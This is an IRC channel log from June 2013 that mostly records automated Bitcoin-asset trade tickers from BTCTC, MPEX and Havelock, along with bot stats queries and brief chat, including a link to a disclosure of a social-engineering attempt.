00:30:20 [BTCTC] [ASICMINER-PT] 7 @ 2.489 = 17.423 BTC [-] Jun 09 00:38:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 09 00:41:49 [MPEX] [S.MPOE] 10508 @ 0.00072644 = 7.6334 BTC [+] Jun 09 00:50:53 [BTCTC] [TAT.ASICMINER] 21 @ 0.025 = 0.525 BTC [+] Jun 09 00:54:04 [BTCTC] [BITVPS] 30 @ 0.000664 = 0.0199 BTC [+] Jun 09 00:54:08 [BTCTC] [BITVPS] 200 @ 0.000663 = 0.1326 BTC [-] Jun 09 00:54:11 [BTCTC] [BITVPS] 185 @ 0.000662 = 0.1225 BTC [-] Jun 09 00:54:15 [BTCTC] [BITVPS] 18 @ 0.000661 = 0.0119 BTC [-] Jun 09 00:54:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.02495 = 0.0499 BTC [-] Jun 09 00:54:25 [BTCTC] [BITVPS] 100 @ 0.00066 = 0.066 BTC [-] Jun 09 00:54:27 [BTCTC] [BITVPS] 100 @ 0.00066 = 0.066 BTC [-] Jun 09 00:54:28 [BTCTC] [BITVPS] 100 @ 0.000651 = 0.0651 BTC [-] Jun 09 00:54:29 [BTCTC] [BITVPS] 100 @ 0.00065 = 0.065 BTC [-] Jun 09 00:54:30 [BTCTC] [BITVPS] 100 @ 0.00065 = 0.065 BTC [-] Jun 09 00:54:32 [BTCTC] [BITVPS] 100 @ 0.000649 = 0.0649 BTC [-] Jun 09 00:54:37 [BTCTC] [BITVPS] 100 @ 0.000648 = 0.0648 BTC [-] Jun 09 00:54:43 [BTCTC] [BITVPS] 75 @ 0.000647 = 0.0485 BTC [-] Jun 09 00:54:46 [BTCTC] [BITVPS] 100 @ 0.000647 = 0.0647 BTC [-] Jun 09 00:54:48 [BTCTC] [BITVPS] 100 @ 0.000645 = 0.0645 BTC [-] Jun 09 00:54:49 [BTCTC] [BITVPS] 80 @ 0.000644 = 0.0515 BTC [-] Jun 09 00:54:51 [BTCTC] [BITVPS] 100 @ 0.000644 = 0.0644 BTC [-] Jun 09 00:54:52 [BTCTC] [BITVPS] 100 @ 0.000643 = 0.0643 BTC [-] Jun 09 00:54:54 [BTCTC] [BITVPS] 70 @ 0.000642 = 0.0449 BTC [-] Jun 09 00:54:54 [BTCTC] [BITVPS] 100 @ 0.000642 = 0.0642 BTC [-] Jun 09 00:54:55 [BTCTC] [BITVPS] 42 @ 0.000641 = 0.0269 BTC [-] Jun 09 00:54:59 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Jun 09 00:58:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] Jun 09 00:59:50 [HAVELOCK] [ASICM] 136 @ 0.02529 = 3.4394 BTC [+] Jun 09 00:59:53 [HAVELOCK] [ASICM] 654 @ 0.02529 = 16.5397 BTC [+] Jun 09 00:59:54 [HAVELOCK] [ASICM] 28 @ 0.0251 = 0.7028 BTC [-] Jun 09 00:59:55 [HAVELOCK] [ASICM] 18 @ 0.02500014 = 0.45 BTC [-] Jun 09 01:06:01 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [+] Jun 09 01:08:40 [HAVELOCK] [ASICM] 25 @ 0.02500014 = 0.625 BTC [-] Jun 09 01:08:41 [HAVELOCK] [ASICM] 81 @ 0.0250001 = 2.025 BTC [-] Jun 09 01:08:41 [HAVELOCK] [ASICM] 444 @ 0.025 = 11.1 BTC [-] Jun 09 01:19:35 [MPEX] [S.MPOE] 9405 @ 0.00072786 = 6.8455 BTC [+] Jun 09 01:19:56 [MPEX] [S.MPOE] 748 @ 0.00072683 = 0.5437 BTC [-] Jun 09 01:23:27 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 09 01:36:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 09 01:38:31 [BTCTC] [ASICMINER-PT] 17 @ 2.49 = 42.33 BTC [+] Jun 09 01:38:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 09 01:41:23 [BTCTC] [ASICMINER-PT] 10 @ 2.489 = 24.89 BTC [-] Jun 09 01:42:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.025 = 0.625 BTC [+] Jun 09 01:42:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [+] Jun 09 01:46:21 [HAVELOCK] [ASICM] 1 @ 0.02517499 BTC [+] Jun 09 01:50:28 [BTCTC] [S.MPOE-PT] 1 @ 0.000724 BTC [+] Jun 09 01:53:43 Who wrote gribble? Jun 09 01:55:04 urmomlol Jun 09 01:56:28 I don't reckon much to gribble's difficulty forecasts. Jun 09 02:05:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.189997 BTC [+] Jun 09 02:32:18 ;;next Jun 09 02:32:18 retracement target: 116-117 | #bitcoin [Sat, 08 Jun 2013 02:18:26 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 21 hours, 13 minutes, and 53 seconds ago Jun 09 02:32:32 ;;bc,stats Jun 09 02:32:33 Current Blocks: 240490 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 1429 blocks | Next Difficulty In About: 1 week, 1 day, 2 hours, 51 minutes, and 49 seconds | Next Difficulty Estimate: 18829868.4825 | Estimated Percent Change: 20.66072 Jun 09 02:46:37 [MPEX] [S.MPOE] 3450 @ 0.00072929 = 2.5161 BTC [+] Jun 09 02:46:38 [MPEX] [S.MPOE] 5100 @ 0.00073103 = 3.7283 BTC [+] Jun 09 02:46:41 [MPEX] [S.MPOE] 350 @ 0.00073272 = 0.2565 BTC [+] Jun 09 02:49:32 [MPEX] [S.MPOE] 8950 @ 0.00073272 = 6.5578 BTC [+] Jun 09 02:55:11 [BTCTC] [BASIC-MINING] 1 @ 0.652001 BTC [-] Jun 09 02:59:31 [HAVELOCK] [ASICM] 20 @ 0.0251 = 0.502 BTC [-] Jun 09 02:59:32 [HAVELOCK] [ASICM] 1 @ 0.02500002 BTC [-] Jun 09 02:59:33 [HAVELOCK] [ASICM] 479 @ 0.02500001 = 11.975 BTC [-] Jun 09 02:59:41 [BTCTC] [BASIC-MINING] 1 @ 0.652001 BTC [-] Jun 09 03:01:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 09 03:06:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 09 03:07:02 [BTCTC] [TAT.ASICMINER] 22 @ 0.025 = 0.55 BTC [+] Jun 09 03:08:27 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 09 03:10:13 [BTCTC] [ASICMINER-PT] 3 @ 2.486 = 7.458 BTC [-] Jun 09 03:10:49 [BTCTC] [ASICMINER-PT] 1 @ 2.481 BTC [-] Jun 09 03:11:13 [BTCTC] [ASICMINER-PT] 5 @ 2.48 = 12.4 BTC [-] Jun 09 03:11:49 [BTCTC] [ASICMINER-PT] 1 @ 2.4721 BTC [-] Jun 09 03:12:12 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [-] Jun 09 03:12:48 [BTCTC] [ASICMINER-PT] 1 @ 2.4716 BTC [-] Jun 09 03:13:16 [BTCTC] [ASICMINER-PT] 2 @ 2.47101 = 4.942 BTC [-] Jun 09 03:26:55 [HAVELOCK] [ASICM] 6 @ 0.02517498 = 0.151 BTC [+] Jun 09 03:26:57 [HAVELOCK] [ASICM] 178 @ 0.02517499 = 4.4811 BTC [+] Jun 09 03:33:48 [HAVELOCK] [ASICM] 40 @ 0.02517499 = 1.007 BTC [+] Jun 09 03:36:03 [MPEX] [O.USD.C110T] 5 @ 0.29587911 = 1.4794 BTC [-] Jun 09 03:37:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 09 03:37:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.02495 = 0.2495 BTC [-] Jun 09 03:38:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.024899 = 0.0996 BTC [-] Jun 09 03:43:41 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 09 03:44:43 [BTCTC] [TAT.ASICMINER] 31 @ 0.025 = 0.775 BTC [+] Jun 09 03:44:49 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] Jun 09 03:46:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Jun 09 03:49:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.024899 = 0.1494 BTC [-] Jun 09 03:49:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02489 = 0.0498 BTC [-] Jun 09 03:49:34 [BTCTC] [S.DICE-PT] 5 @ 0.002699 = 0.0135 BTC [-] Jun 09 03:59:34 [HAVELOCK] [ASICM] 31 @ 0.0251 = 0.7781 BTC [-] Jun 09 03:59:52 [BTCTC] [TAT.ASICMINER] 27 @ 0.025 = 0.675 BTC [+] Jun 09 04:00:16 [BTCTC] [TAT.ASICMINER] 11 @ 0.02489 = 0.2738 BTC [-] Jun 09 04:02:39 [BTCTC] [B.YABMC] 6 @ 0.013489 = 0.0809 BTC [-] Jun 09 04:03:03 [MPEX] [S.MPOE] 1493 @ 0.00072683 = 1.0852 BTC [-] Jun 09 04:03:18 [MPEX] [S.MPOE] 4307 @ 0.00072573 = 3.1257 BTC [-] Jun 09 04:07:29 [HAVELOCK] [ASICM] 12 @ 0.02517499 = 0.3021 BTC [+] Jun 09 04:16:56 [BTCTC] [B.YABMC] 1 @ 0.013489 BTC [-] Jun 09 04:21:29 [MPEX] [S.MPOE] 14 @ 0.00072573 = 0.0102 BTC [-] Jun 09 04:21:31 [MPEX] [S.MPOE] 4321 @ 0.00072572 = 3.1358 BTC [-] Jun 09 04:21:31 [MPEX] [S.MPOE] 10600 @ 0.00072571 = 7.6925 BTC [-] Jun 09 04:23:09 [BTCTC] [COGNITIVE] 1 @ 0.276001 BTC [-] Jun 09 04:23:50 [HAVELOCK] [HIM] 10 @ 0.2825 = 2.825 BTC [-] Jun 09 04:25:51 [BTCTC] [PAJKA.BOND] 1 @ 0.089 BTC [-] Jun 09 04:34:03 2008 – Present (5 years) Jun 09 04:34:03 continously searching for a job to need me strongly/to pay for me ..and for an always single and caring to me man, first(a superhero like I am/healthy, too) Jun 09 04:34:10 this chick should be on bitcointalk. Jun 09 04:34:14 http://ro.linkedin.com/pub/amy-neagoe/6b/235/805 Jun 09 04:38:38 [BTCTC] [TAT.ASICMINER] 8 @ 0.025034 = 0.2003 BTC [+] Jun 09 04:49:39 [HAVELOCK] [ASICM] 6 @ 0.02500001 = 0.15 BTC [-] Jun 09 04:49:47 [HAVELOCK] [ASICM] 6 @ 0.02499001 = 0.1499 BTC [-] Jun 09 04:59:01 [HAVELOCK] [ASICM] 20 @ 0.02499 = 0.4998 BTC [-] Jun 09 04:59:29 [HAVELOCK] [ASICM] 8 @ 0.02499 = 0.1999 BTC [-] Jun 09 05:01:09 [HAVELOCK] [ASICM] 5 @ 0.02514999 = 0.1257 BTC [+] Jun 09 05:14:21 [HAVELOCK] [ASICM] 5 @ 0.02499001 = 0.125 BTC [-] Jun 09 05:22:34 [HAVELOCK] [ASICM] 195 @ 0.02499001 = 4.8731 BTC [-] Jun 09 05:23:56 [BTCTC] [BTC-BOND] 9 @ 0.009996 = 0.09 BTC [+] Jun 09 05:45:29 [BTCTC] [ASICMINER-PT] 10 @ 2.489 = 24.89 BTC [+] Jun 09 05:46:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.024999 = 0.05 BTC [-] Jun 09 05:48:26 [BTCTC] [TAT.ASICMINER] 14 @ 0.024999 = 0.35 BTC [-] Jun 09 05:49:30 [HAVELOCK] [ASICM] 58 @ 0.02499 = 1.4494 BTC [-] Jun 09 05:49:30 [HAVELOCK] [ASICM] 111 @ 0.0249 = 2.7639 BTC [-] Jun 09 05:49:31 [HAVELOCK] [ASICM] 131 @ 0.0249 = 3.2619 BTC [-] Jun 09 05:50:06 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Jun 09 06:00:30 [BTCTC] [TAT.ASICMINER] 23 @ 0.02489 = 0.5725 BTC [-] Jun 09 06:00:34 [BTCTC] [TAT.ASICMINER] 22 @ 0.02486 = 0.5469 BTC [-] Jun 09 06:01:18 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [-] Jun 09 06:02:56 [BTCTC] [ASICMINER-PT] 2 @ 2.485 = 4.97 BTC [-] Jun 09 06:04:55 [HAVELOCK] [ASICM] 26 @ 0.0249 = 0.6474 BTC [-] Jun 09 06:04:56 [HAVELOCK] [ASICM] 10 @ 0.0248911 = 0.2489 BTC [-] Jun 09 06:04:57 [HAVELOCK] [ASICM] 50 @ 0.02487501 = 1.2438 BTC [-] Jun 09 06:04:59 [HAVELOCK] [ASICM] 57 @ 0.02487 = 1.4176 BTC [-] Jun 09 06:05:00 [HAVELOCK] [ASICM] 16 @ 0.024855 = 0.3977 BTC [-] Jun 09 06:05:01 [HAVELOCK] [ASICM] 100 @ 0.02485 = 2.485 BTC [-] Jun 09 06:05:02 [HAVELOCK] [ASICM] 2 @ 0.02485 = 0.0497 BTC [-] Jun 09 06:05:02 [HAVELOCK] [ASICM] 39 @ 0.02485 = 0.9692 BTC [-] Jun 09 06:06:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.02486 = 0.1492 BTC [-] Jun 09 06:06:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.02485 = 0.1243 BTC [-] Jun 09 06:06:14 [BTCTC] [TAT.ASICMINER] 199 @ 0.024822 = 4.9396 BTC [-] Jun 09 06:06:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.024821 = 0.4964 BTC [-] Jun 09 06:06:20 [BTCTC] [TAT.ASICMINER] 29 @ 0.02482 = 0.7198 BTC [-] Jun 09 06:06:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02482 BTC [-] Jun 09 06:06:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.02482 = 0.1241 BTC [-] Jun 09 06:06:25 [BTCTC] [TAT.ASICMINER] 250 @ 0.024812 = 6.203 BTC [-] Jun 09 06:06:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.024811 = 0.0992 BTC [-] Jun 09 06:06:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.02481 = 0.1985 BTC [-] Jun 09 06:06:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.02481 = 0.0992 BTC [-] Jun 09 06:06:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.024804 = 0.2232 BTC [-] Jun 09 06:06:35 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [-] Jun 09 06:06:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.024802 BTC [-] Jun 09 06:06:39 [BTCTC] [TAT.ASICMINER] 42 @ 0.024802 = 1.0417 BTC [-] Jun 09 06:06:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.024802 = 0.0992 BTC [-] Jun 09 06:06:46 [BTCTC] [TAT.ASICMINER] 27 @ 0.024801 = 0.6696 BTC [-] Jun 09 06:06:50 [BTCTC] [TAT.ASICMINER] 199 @ 0.0248 = 4.9352 BTC [-] Jun 09 06:06:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [-] Jun 09 06:06:58 [BTCTC] [TAT.ASICMINER] 26 @ 0.0248 = 0.6448 BTC [-] Jun 09 06:06:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.0248 = 0.248 BTC [-] Jun 09 06:07:01 [BTCTC] [TAT.ASICMINER] 28 @ 0.024705 = 0.6917 BTC [-] Jun 09 06:07:02 [BTCTC] [TAT.ASICMINER] 23 @ 0.024702 = 0.5681 BTC [-] Jun 09 06:07:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.0247 = 0.0988 BTC [-] Jun 09 06:07:07 [BTCTC] [TAT.ASICMINER] 26 @ 0.0247 = 0.6422 BTC [-] Jun 09 06:07:11 [BTCTC] [TAT.ASICMINER] 100 @ 0.0247 = 2.47 BTC [-] Jun 09 06:07:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02469 BTC [-] Jun 09 06:07:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.02469 = 0.4938 BTC [-] Jun 09 06:07:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.0246 = 0.0984 BTC [-] Jun 09 06:07:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.0246 = 0.0738 BTC [-] Jun 09 06:07:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.0246 = 0.0738 BTC [-] Jun 09 06:07:29 [BTCTC] [TAT.ASICMINER] 60 @ 0.0246 = 1.476 BTC [-] Jun 09 06:07:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.02459 = 0.2459 BTC [-] Jun 09 06:07:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.02455 = 0.1964 BTC [-] Jun 09 06:07:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02451 BTC [-] Jun 09 06:07:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] Jun 09 06:07:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] Jun 09 06:07:48 [BTCTC] [TAT.ASICMINER] 75 @ 0.02451 = 1.8383 BTC [-] Jun 09 06:07:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.024504 = 0.0735 BTC [-] Jun 09 06:07:53 [BTCTC] [TAT.ASICMINER] 15 @ 0.024503 = 0.3675 BTC [-] Jun 09 06:07:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.024502 = 0.1225 BTC [-] Jun 09 06:08:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] Jun 09 06:08:07 [BTCTC] [TAT.ASICMINER] 60 @ 0.0245 = 1.47 BTC [-] Jun 09 06:18:28 [MPEX] [S.MPOE] 2950 @ 0.00072511 = 2.1391 BTC [-] Jun 09 06:20:57 [BTCTC] [ASICMINER-PT] 10 @ 2.485 = 24.85 BTC [-] Jun 09 06:25:47 [HAVELOCK] [ASICM] 6 @ 0.02509998 = 0.1506 BTC [+] Jun 09 06:26:34 [HAVELOCK] [ASICM] 73 @ 0.02509999 = 1.8323 BTC [+] Jun 09 06:28:34 [HAVELOCK] [ASICM] 9 @ 0.02485 = 0.2237 BTC [-] Jun 09 06:28:36 [HAVELOCK] [ASICM] 2 @ 0.02485 = 0.0497 BTC [-] Jun 09 06:29:25 [HAVELOCK] [ASICM] 6 @ 0.02484001 = 0.149 BTC [-] Jun 09 06:30:31 [BTCTC] [ASICMINER-PT] 4 @ 2.485 = 9.94 BTC [-] Jun 09 06:31:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4802 BTC [-] Jun 09 06:31:47 [BTCTC] [ASICMINER-PT] 3 @ 2.4802 = 7.4406 BTC [-] Jun 09 06:31:50 [BTCTC] [ASICMINER-PT] 15 @ 2.4801 = 37.2015 BTC [-] Jun 09 06:31:53 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] Jun 09 06:33:29 [BTCTC] [PAJKA.BOND] 2 @ 0.0888 = 0.1776 BTC [-] Jun 09 06:34:44 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [+] Jun 09 06:36:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.024998 = 0.5 BTC [+] Jun 09 06:37:13 [BTCTC] [TAT.ASICMINER] 9 @ 0.024998 = 0.225 BTC [+] Jun 09 06:51:41 [BTCTC] [TAT.ASICMINER] 19 @ 0.024997 = 0.4749 BTC [-] **** BEGIN LOGGING AT Sun Jun 9 16:44:05 2013 Jun 09 16:45:40 [BTCTC] [S.DICE-PT] 4 @ 0.002837 = 0.0113 BTC [+] Jun 09 16:46:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.024497 BTC [+] Jun 09 16:47:27 [BTCTC] [TAT.ASICMINER] 16 @ 0.0245 = 0.392 BTC [+] Jun 09 16:48:39 [HAVELOCK] [ASICM] 5 @ 0.0243999 = 0.122 BTC [+] Jun 09 16:49:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.0246 = 0.1968 BTC [+] Jun 09 16:49:13 [MPEX] [S.MPOE] 52186 @ 0.00072266 = 37.7127 BTC [-] Jun 09 16:49:52 [BTCTC] [S.DICE-PT] 15 @ 0.002837 = 0.0426 BTC [+] Jun 09 16:49:56 [BTCTC] [S.DICE-PT] 4 @ 0.002838 = 0.0114 BTC [+] Jun 09 16:49:57 [BTCTC] [S.DICE-PT] 31 @ 0.002845 = 0.0882 BTC [+] Jun 09 16:50:09 https://twitter.com/fontase Jun 09 16:50:22 2. post Jun 09 16:51:10 [HAVELOCK] [SDICE] 2 @ 0.2398 = 0.4796 BTC [+] Jun 09 16:51:12 [HAVELOCK] [SDICE] 10 @ 0.23988 = 2.3988 BTC [+] Jun 09 16:51:13 [HAVELOCK] [SDICE] 5 @ 0.23989 = 1.1995 BTC [+] Jun 09 16:53:03 [BTCTC] [BITVPS] 75 @ 0.000728 = 0.0546 BTC [-] Jun 09 16:59:49 parseval: have you seen fusioncharts? Jun 09 17:01:51 I think I went through the demo gallery, never used it **** ENDING LOGGING AT Sun Jun 9 17:20:33 2013 **** BEGIN LOGGING AT Sun Jun 9 18:19:59 2013 Jun 09 18:20:14 sooo, i've just been hit by a little bit of social engineering. details : Jun 09 18:20:19 http://trilema.com/2013/in-the-interest-of-full-disclosure-failed-social-engineering-attempt-and-0day-vulnerability-in-betadesk/ Jun 09 18:21:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.024477 BTC [+] Jun 09 18:21:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.024477 = 0.4406 BTC [+] Jun 09 18:21:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.024478 = 1.2239 BTC [+] Jun 09 18:22:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.024479 = 0.4896 BTC [+] Jun 09 18:22:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.02448 = 0.049 BTC [+] Jun 09 18:34:56 [BTCTC] [S.DICE-PT] 4 @ 0.002411 = 0.0096 BTC [-] Jun 09 18:37:04 [BTCTC] [TAT.ASICMINER] 17 @ 0.024465 = 0.4159 BTC [-] Jun 09 18:37:27 [BTCTC] [ASICMINER-PT] 1 @ 2.31 BTC [-] Jun 09 18:44:43 [BTCTC] [ASICMINER-PT] 1 @ 2.328999 BTC [+] Jun 09 18:45:47 [BTCTC] [ASICMINER-PT] 2 @ 2.329 = 4.658 BTC [+] Jun 09 18:46:23 [BTCTC] [ASICMINER-PT] 2 @ 2.329 = 4.658 BTC [+] Jun 09 18:48:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.023627 = 0.4725 BTC [-] Jun 09 18:48:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.023624 BTC [-] Jun 09 18:48:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.02362 = 0.0472 BTC [-] Jun 09 18:48:52 [BTCTC] [TAT.ASICMINER] 92 @ 0.02361 = 2.1721 BTC [-] Jun 09 18:48:58 [BTCTC] [TAT.ASICMINER] 19 @ 0.02361 = 0.4486 BTC [-] Jun 09 18:49:06 [BTCTC] [ASICMINER-PT] 1 @ 2.329 BTC [+] Jun 09 18:54:44 [BTCTC] [ASICMINER-PT] 2 @ 2.338 = 4.676 BTC [+] Jun 09 19:01:04 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [+] Jun 09 19:03:25 [HAVELOCK] [ASICM] 90 @ 0.024 = 2.16 BTC [+] Jun 09 19:03:50 [HAVELOCK] [ASICM] 83 @ 0.024 = 1.992 BTC [+] Jun 09 19:06:56 [BTCTC] [RSM] 5 @ 0.0073 = 0.0365 BTC [-] Jun 09 19:08:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.024438 BTC [+] Jun 09 19:11:21 [BTCTC] [S.MPOE-PT] 5 @ 0.000723 = 0.0036 BTC [-] Jun 09 19:14:55 [HAVELOCK] [HIM] 20 @ 0.282 = 5.64 BTC [-] Jun 09 19:18:35 [MPEX] [S.MPOE] 1300 @ 0.0007253 = 0.9429 BTC [+] Jun 09 19:19:05 [BTCTC] [ASICMINER-PT] 3 @ 2.338 = 7.014 BTC [+] Jun 09 19:19:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.024435 = 0.0733 BTC [-] Jun 09 19:22:21 [BTCTC] [ASICMINER-PT] 1 @ 2.339 BTC [+] Jun 09 19:22:22 [BTCTC] [ASICMINER-PT] 8 @ 2.34 = 18.72 BTC [+] Jun 09 19:22:23 [BTCTC] [ASICMINER-PT] 1 @ 2.3499 BTC [+] Jun 09 19:23:32 [DIVIDEND PAID] [TAT.VIRTUALMINE] 115,000 @ .00003223 Jun 09 19:24:41 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [+] Jun 09 19:24:52 [HAVELOCK] [ASICM] 239 @ 0.0235 = 5.6165 BTC [-] Jun 09 19:29:36 [BTCTC] [ASICMINER-PT] 2 @ 2.35 = 4.7 BTC [+] Jun 09 19:30:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.024434 = 0.0733 BTC [-] Jun 09 19:33:54 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] Jun 09 19:34:11 [BTCTC] [ESECURITYSABTC] 1 @ 0.18001 BTC [-] Jun 09 19:34:44 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] Jun 09 19:35:57 [BTCTC] [ASICMINER-PT] 1 @ 2.34999 BTC [-] Jun 09 19:36:00 [BTCTC] [ASICMINER-PT] 9 @ 2.35 = 21.15 BTC [+] Jun 09 19:36:24 [HAVELOCK] [ASICM] 12 @ 0.024 = 0.288 BTC [+] Jun 09 19:36:59 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] Jun 09 19:39:04 [HAVELOCK] [ASICM] 40 @ 0.0235 = 0.94 BTC [-] Jun 09 19:39:05 [HAVELOCK] [ASICM] 133 @ 0.024 = 3.192 BTC [+] Jun 09 19:39:07 [HAVELOCK] [ASICM] 41 @ 0.0240999 = 0.9881 BTC [+] Jun 09 19:39:08 [HAVELOCK] [ASICM] 50 @ 0.0243 = 1.215 BTC [+] Jun 09 19:39:08 [HAVELOCK] [ASICM] 86 @ 0.02465 = 2.1199 BTC [+] Jun 09 19:40:41 [BTCTC] [ASICMINER-PT] 8 @ 2.35 = 18.8 BTC [+] Jun 09 19:41:23 [BTCTC] [TAT.ASICMINER] 19 @ 0.024398 = 0.4636 BTC [-] Jun 09 19:41:40 [BTCTC] [PAJKA.BOND] 2 @ 0.083 = 0.166 BTC [+] Jun 09 19:43:20 [MPEX] [S.DICE] 900 @ 0.00249788 = 2.2481 BTC [+] Jun 09 19:43:22 [MPEX] [S.DICE] 1000 @ 0.00249789 = 2.4979 BTC [+] Jun 09 19:43:27 [BTCTC] [TAT.ASICMINER] 16 @ 0.024399 = 0.3904 BTC [+] Jun 09 19:43:31 [MPEX] [S.DICE] 900 @ 0.0024979 = 2.2481 BTC [+] Jun 09 19:43:33 [MPEX] [S.DICE] 1000 @ 0.00249791 = 2.4979 BTC [+] Jun 09 19:43:39 [MPEX] [S.DICE] 888 @ 0.00249793 = 2.2182 BTC [+] Jun 09 19:43:53 [BTCTC] [ASICMINER-PT] 2 @ 2.35 = 4.7 BTC [+] Jun 09 19:45:02 [HAVELOCK] [ASICM] 37 @ 0.02465 = 0.9121 BTC [+] Jun 09 19:46:36 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] Jun 09 19:49:15 Good morning sunshines! Jun 09 19:50:50 ;;next Jun 09 19:50:51 retracement targets: 110-111, 115-118 | #bitcoin [Sun, 09 Jun 2013 06:43:15 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 10 hours, 7 minutes, and 36 seconds ago Jun 09 19:51:13 Wow seems like there was a bit of action last night. Luckily, I got a piece of the action. Jun 09 19:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.39 BTC [+] Jun 09 19:59:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] Jun 09 20:00:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] Jun 09 20:02:22 [BTCTC] [ASICMINER-PT] 4 @ 2.4 = 9.6 BTC [+] Jun 09 20:10:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.024397 = 0.0488 BTC [-] Jun 09 20:11:02 [MPEX] [S.MPOE] 25250 @ 0.00072561 = 18.3217 BTC [+] Jun 09 20:11:25 [MPEX] [S.MPOE] 30000 @ 0.00072309 = 21.6927 BTC [-] Jun 09 20:23:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0243 BTC [-] Jun 09 20:27:03 [MPEX] [S.MPOE] 5000 @ 0.00072628 = 3.6314 BTC [+] Jun 09 20:27:05 [MPEX] [S.MPOE] 4321 @ 0.00072629 = 3.1383 BTC [+] Jun 09 20:27:06 [MPEX] [S.MPOE] 1300 @ 0.00072644 = 0.9444 BTC [+] Jun 09 20:27:51 [MPEX] [S.MPOE] 1300 @ 0.00072645 = 0.9444 BTC [+] Jun 09 20:28:03 [MPEX] [S.MPOE] 9479 @ 0.00072649 = 6.8864 BTC [+] Jun 09 20:28:10 [BTCTC] [ASICMINER-PT] 1 @ 2.350501 BTC [-] Jun 09 20:28:55 [BTCTC] [ASICMINER-PT] 2 @ 2.3505 = 4.701 